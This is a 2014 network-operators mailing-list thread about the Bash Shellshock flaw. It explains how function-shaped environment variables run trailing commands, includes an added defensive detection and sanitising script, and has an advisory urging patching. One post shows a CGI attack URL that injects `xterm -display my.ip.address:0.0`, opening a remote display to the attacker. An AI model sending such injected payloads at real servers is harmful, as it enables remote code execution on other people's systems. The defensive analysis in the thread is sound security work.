As I understand it, the problem is significantly worse than that. It's possible to add shell commands after the closing '}' which subsequently get executed by bash, for example:

env x='() { :;}; echo vulnerable' bash -c "echo this is a test"

- this really should not do what it actually does.

The big risk is in CGI execution under web servers. Apache (and others) automatically add CGI URI arguments as environment variables prior to executing CGI scripts. So if I find a CGI script on your web site, and add "?foo='() { ;;}; xterm -display my.ip.address:0.0'" into the URL then if the site CGI script executes _anything_ through bash, maybe even as innocuous as `date` - then that command in the URL gets executed. (I haven't verified that command yet, but you get the gist).

Even if your CGI scripts carefully sanitise and check inputs, there's still a hole there through hidden environment variables that can get executed.

-- Kerry

On 25/09/2014 14:41, Don Stokes wrote:

The fundamental problem is this:

In starting, bash treats ANY environment variable whose value starts with "() {" (i.e. open paren, close paren, space, open curly) as a function to be parsed and imported. For example:

$ export ls='() { echo bwahahaha
; }'
$ bash # any invocation of bash, including from system(), or as /bin/sh
$ ls
bwahahaha

This is the mechanism by which bash's "export -f" (export function) works. (By default, functions are not exported to the environment, which is why you never noticed this before.)

Basically, that functionality has a ridiculous number of potential gotchas, even if the parsing is properly fixed. The unpatched code just blithely throws the string at the command interpreter, and the patches are just band-aids on top of that.

-- don
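The import mechanism Don describes and the CGI exposure Kerry describes, as an added example that is not code from the thread: a POSIX sh script with a check for the trailing-command behaviour and a wrapper that drops function-shaped variables from the environment before exec'ing a CGI program. The function names (shellshock_test, list_function_env_vars, run_cgi_clean) are mine, and the wrapper assumes the shell running it is itself already patched.

```shell
#!/bin/sh
# Added example, not from the thread. Two defender-side helpers for the
# mechanism Don describes and the CGI exposure Kerry describes: a check
# for the trailing-command bug, and an exec wrapper that strips every
# function-shaped variable from the environment before a CGI program (and
# any bash it spawns, e.g. via system()) sees it. Assumption: the shell
# running this wrapper is itself patched, otherwise any trailing command
# has already run by the time the wrapper starts.

# Run the bash named by $1 (default: "bash" in PATH) with a function-shaped
# variable carrying a trailing command. Prints "vulnerable" and returns 1
# if that command ran, otherwise prints "not vulnerable" and returns 0.
shellshock_test() {
    target=${1:-bash}
    out=$(env x='() { :;}; echo vulnerable' "$target" -c 'echo harmless' 2>/dev/null) || :
    case "$out" in
        *vulnerable*) echo "vulnerable"; return 1 ;;
        *)            echo "not vulnerable"; return 0 ;;
    esac
}

# Print, one per line, the names of environment variables whose value
# starts with "() {", i.e. what an unpatched bash would import as a
# function. Only the first line of a multi-line value (like Don's
# export) is inspected, which is where the "() {" prefix has to be.
list_function_env_vars() {
    env | while IFS= read -r line; do
        case "$line" in *=*) ;; *) continue ;; esac   # continuation line
        name=${line%%=*}
        value=${line#*=}
        # Skip names that are not plain identifiers, such as the BASH_FUNC_x%%
        # form a patched bash uses for "export -f"; they cannot be unset here.
        case "$name" in ''|*[!A-Za-z0-9_]*) continue ;; esac
        case "$value" in "() {"*) printf '%s\n' "$name" ;; esac
    done
}

# Exec "$@" (the CGI program) in a subshell whose environment no longer
# holds any function-shaped variable. Both the variable and a same-named
# function are unset, covering either way a bash may have imported it.
run_cgi_clean() {
    (
        for n in $(list_function_env_vars); do
            unset "$n" 2>/dev/null || :
            unset -f "$n" 2>/dev/null || :
        done
        exec "$@"
    )
}
```

Running `shellshock_test /bin/bash` on a host reports whether that binary still executes the trailing command; `run_cgi_clean /path/to/cgi` is the wrapper a web server would invoke in place of the CGI program itself.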
On 25/09/14 14:14, Nicholas Lee wrote:
Fix may not be complete either:
On Thu, Sep 25, 2014 at 11:06 AM, Sebastian Castro wrote:

On 25/09/14 10:57 am, Dean Pemberton wrote:
Hi all,

This isn't normally a security vuln release list but this one looks pretty bad.
A newly discovered vulnerability (CVE-2014-6271) in the Bash command-line interpreter poses a critical security risk to Unix and Linux systems. It allows remote code execution.
NZITF is responding to this remote execution exploit, with a News page that we will be keeping up to date - http://www.nzitf.org.nz/news.html [1] .
There are active scans going on already:
http://blog.erratasec.com/2014/09/bash-shellshock-scan-of-internet.html [2]
We are also reaching out to technical and security community points of contact to raise awareness of the issue and ensure necessary action is taken (hence this email to you).

Please note, no patch is yet available for Mac OSX. However, many other patches are available.

So Patch, Patch, Patch.

Regards,
Dean
NZNOG mailing list NZNOG(a)list.waikato.ac.nz
--
Sebastian Castro
Technical Research Manager
.nz Registry Services (New Zealand Domain Name Registry Limited)
desk: +64 4 495 2337 [4]
mobile: +64 21 400535 [5]
http://list.waikato.ac.nz/mailman/listinfo/nznog [3]

Links:
------
[1] http://www.nzitf.org.nz/news.html
[2] http://blog.erratasec.com/2014/09/bash-shellshock-scan-of-internet.html
[3] http://list.waikato.ac.nz/mailman/listinfo/nznog
[4] tel:%2B64%204%20495%202337
[5] tel:%2B64%2021%20400535
[6] https://bugzilla.redhat.com/show_bug.cgi?id=1141597#c23